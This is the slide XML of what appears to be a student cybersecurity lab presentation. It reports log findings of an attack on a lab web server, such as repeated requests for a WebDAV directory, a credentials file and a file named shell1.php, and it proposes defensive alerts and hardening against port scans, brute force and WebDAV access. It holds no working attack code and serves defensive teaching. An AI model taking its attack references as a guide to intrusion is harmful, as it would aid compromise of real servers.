            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792038" y="1566863"/>
            <a:ext cx="7210425" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4462475" y="2562097"/>
            <a:ext cx="3819524" cy="1673667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068275" y="4398038"/>
            <a:ext cx="6781800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792050" y="2456963"/>
            <a:ext cx="3573268" cy="19982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7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50" name="Google Shape;1250;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9100500" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="8686800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>21</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Google Shape;1251;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="667300"/>
            <a:ext cx="7366500" cy="658500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>140 total requests were made for the WebDav directory (192.168.1.105/webdav/)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The files passwd.dav and shell1.php were requested by the attacker 197 times.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1252" name="Google Shape;1252;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611075" y="1367113"/>
            <a:ext cx="3573268" cy="1998250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4543851" y="1209675"/>
            <a:ext cx="3907650" cy="2989100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1255" name="Google Shape;1255;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="517500" y="4198763"/>
            <a:ext cx="7258050" cy="628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5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indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p55"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="90264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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="137882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8" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A9B7C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30" name="Google Shape;1030;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A9B7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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032;p55"/>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33" name="Google Shape;1033;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667"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36" name="Google Shape;1036;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="6213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39" name="Google Shape;1039;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtra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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2231136"/>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1352550" y="3073850"/>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1352550" y="3918975"/>
            <a:ext cx="7517100" cy="621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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="2233550"/>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45" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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46" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3918975"/>
            <a:ext cx="9168600" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="1554475" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">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pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="20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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">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262" name="Google Shape;1262;p73"/>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74"/>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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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23</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-64500" y="1602450"/>
            <a:ext cx="3644100" cy="30513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t>Though useful, having alerts for every port scan is unrealistic.  Setup a low-level alert for any port scanning, with a threshold of 10, and a severe alert for anything above 100.  Have alerts for any use of Nmap.  Setup a critical alert for aggressive scans.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p74"/>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100"/>
              <a:t>Whitelist known IPs and have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> block unauthorized IPs from scanning.</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Schedule regular security checks on all ports.  Close ports that don’t need to be open.  Keep all services running in ports on ports updated.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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75"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p75"/>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100"/>
              <a:t>First I would create a baseline for what is a normal number of requests over time. Trigger an alert when the upper threshold of that baseline is exceeded.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Use strong passwords and limit login attempts, using two-factor authentication, and use web application firewalls (WAFs).  In general, make the root user limited to specific users to protect against SSH attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Create 2 alerts.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>A low-level alert for more than 3 password failures.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Create a critical alert for more than 10 failures.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Create an alert for non-whitelisted IPs attempting to access the directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;p75"/>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100"/>
              <a:t>Set a timeout of 30min+ for more than 3 password failures, and that time increases with every failure.  Blacklist the IP after 10 failed password attempts.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Increase password strength requirements to the directory (min length, mixture of upper care, lower case, numbers, special characters).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Force a password reset every 3 months.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For privileged accounts create multi-factor authentication.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Limit user access to the directory</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Remove all reference to the hidden directory in the webserver.</a:t>
            </a:r>
            <a:endParaRPr sz="11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76"/>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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1284" name="Google Shape;1284;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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25													</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Google Shape;1285;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-72550" y="1604700"/>
            <a:ext cx="36441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t>For all password portals, such as the web server and SSH, setup alerts for more than 3 failed attempts, and critical alerts for 10 failed attempts.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p76"/>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sz="1100"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etup account timeout and lockout rules for failed password attempts to block brute forcing.  After 3 failures a 30min timer is triggered an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>increased</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with every successive password failure, up to 10, upon which the user account is locked, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> expiry is triggered and a critical alert is sent to the security team.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Increase password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>strength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> requirements and expiry every 3 months.  Consider multi-factor authentication.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Rate-limit traffic to block mass password attempts.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="15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0" name="Shape 1290"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p77"/>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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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26																						</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p77"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create an alert for non-whitelisted IPs connecting to WebDav and from non-secure locations.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p77"/>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a:t>Limit user access to WebDav.</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Harden authentication to WebDav: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> requirements, MFA, whitelisting IPs.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Scanning all incoming traffic with anti-virus/anti/malware.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Update regularly.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Upgrade to a more secure application.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Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>only allowing internal access to WebDav, within the companies building/network, block external connections.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
